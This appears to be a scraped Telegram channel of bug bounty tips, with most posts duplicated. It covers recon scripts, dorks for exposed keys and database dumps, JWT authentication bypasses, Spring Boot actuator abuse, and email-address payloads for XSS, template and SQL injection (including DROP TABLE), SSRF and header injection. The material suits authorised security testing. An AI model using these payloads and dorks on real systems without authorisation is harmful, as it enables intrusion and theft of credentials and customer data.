#Bug_Bounty_Tips_2
🛡BugBounty_Tips
Here’s a handy command to extract URLs from junk / assorted data:
1-From Files:
🛡BugBounty_Tips
Here’s a handy command to extract URLs from junk / assorted data:
1-From Files:
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*2-From Websites:
curl https://target.com/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*☣️@InfoSecTube
#Bug_Bounty_Tips_3
🛡BugBounty_Tips
Here’s a tip to extract interesting (potentially sensitive) information from unpacked APK files (Android App):
Make sure to first unpack the APK file using apktool like this:
🛡BugBounty_Tips
Here’s a tip to extract interesting (potentially sensitive) information from unpacked APK files (Android App):
Make sure to first unpack the APK file using apktool like this:
apktool d app_name.apkWith this one-liner we can identify URLs, API keys, authentication tokens, credentials, certificate pinning code and much more.
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/☣️@InfoSecTube
#Bug_Bounty_Tips_4
🛡BugBounty_Tips
Here are the top dorks to find Open Redirect vulnerabilities :
🛡BugBounty_Tips
Here are the top dorks to find Open Redirect vulnerabilities :
/{payload}
?next={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
☣️@InfoSecTube#Bug_Bounty_Tips_5
🛡BugBounty_Tips
Here are 3 tips to bypass JWT token authentication.
Tip #1:
💎Capture the JWT.
💎Change the algorithm to None.
💎Change the content of the claims in the body with whatever you want e.g.: email: [email protected]
💎Send the request with the modified token and check the result.
Tip #2:
✅Capture the JWT token.
✅If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site’s https certificate)
✅Send the request with the modified token and check the response.
✅You can party with the bounty if the backend doesn’t have the algorithm check.
Tip #3: Check for proper server-side session termination
🔰Check if the application is using JWT tokens for authentication.
🔰If so, login to the application and capture the token. (Mostly web apps stores the token in the local storage of the browser)
🔰Now logout of the application.
🔰Now make a request to the privileged endpoint with the token captured earlier.
🔰Sometimes, the request will be successful as the web apps just delete the token from browser and won’t blacklist the tokens in the backend.
☣️@InfoSecTube
🛡BugBounty_Tips
Here are 3 tips to bypass JWT token authentication.
Tip #1:
💎Capture the JWT.
💎Change the algorithm to None.
💎Change the content of the claims in the body with whatever you want e.g.: email: [email protected]
💎Send the request with the modified token and check the result.
Tip #2:
✅Capture the JWT token.
✅If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site’s https certificate)
✅Send the request with the modified token and check the response.
✅You can party with the bounty if the backend doesn’t have the algorithm check.
Tip #3: Check for proper server-side session termination
🔰Check if the application is using JWT tokens for authentication.
🔰If so, login to the application and capture the token. (Mostly web apps stores the token in the local storage of the browser)
🔰Now logout of the application.
🔰Now make a request to the privileged endpoint with the token captured earlier.
🔰Sometimes, the request will be successful as the web apps just delete the token from browser and won’t blacklist the tokens in the backend.
☣️@InfoSecTube
#Bug_Bounty_Tips_6
🛡BugBounty_Tips
Before Run this script we have to install couple of additional tools:
amass
assetfinder
subfinder
filter-resolved
Here’s a quick and basic recon routine for finding subdomains while doing bug bounty:
🛡BugBounty_Tips
Before Run this script we have to install couple of additional tools:
amass
assetfinder
subfinder
filter-resolved
Here’s a quick and basic recon routine for finding subdomains while doing bug bounty:
#!/bin/bash☣️@InfoSecTube
# $1 => example.domain
amass enum --passive -d $1 -o domains_$1
assetfinder --subs-only $1 | tee -a domains_41
subfinder -d $1 -o domains_subfinder_$1
cat domains_subfinder_$1 | tee -a domains_$1
sort -u domains_$1 -o domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
GitHub
GitHub - owasp-amass/amass: In-depth attack surface mapping and asset discovery
In-depth attack surface mapping and asset discovery - owasp-amass/amass
👍1
#Bug_Bounty_Tips_7
🛡BugBounty_Tips
Install Instruction:
apt-get -y install parallel
Here’s a super useful recon one-liner to quickly validate list of hostnames and subdomains:
🛡BugBounty_Tips
Install Instruction:
apt-get -y install parallel
Here’s a super useful recon one-liner to quickly validate list of hostnames and subdomains:
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
This one-liner will spawn 50 instances of curl in parallel and display the HTTP status code and response size in bytes for each host in a beautiful way😊☣️@InfoSecTube
#Bug_Bounty_Tips_8
🛡BugBounty_Tips
Before Run this script you must install several additional tools:
subfinder
amass
httpprob
waybackurls
kxss
this shell script to identify XSS (Cross-Site Scripting) vulnerabilities using a number of open-source tools chained together:
🛡BugBounty_Tips
Before Run this script you must install several additional tools:
subfinder
amass
httpprob
waybackurls
kxss
this shell script to identify XSS (Cross-Site Scripting) vulnerabilities using a number of open-source tools chained together:
#!/bin/bash☣️@InfoSecTube
# $1 => example.domain
subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1
cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
🔥1
#Bug_Bounty_Tips_9
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
#Bug_Bounty_Tips_10
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
#Bug_Bounty_Tips_11
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3
…
https://target.com/node/499
https://target.com/node/500
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
#Bug_Bounty_Tips_12
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
# Search for testing point with gau and fff☣️@InfoSecTube
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
#Bug_Bounty_Tips_13
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
org:YOUR_TARGET http.favicon.hash:116323821
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
🔺Template injection:
🔺SQL injection:
🔺SSRF (Server-Side Request Forgery):
🔺Parameter pollution:
🔺(Email) header injection:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube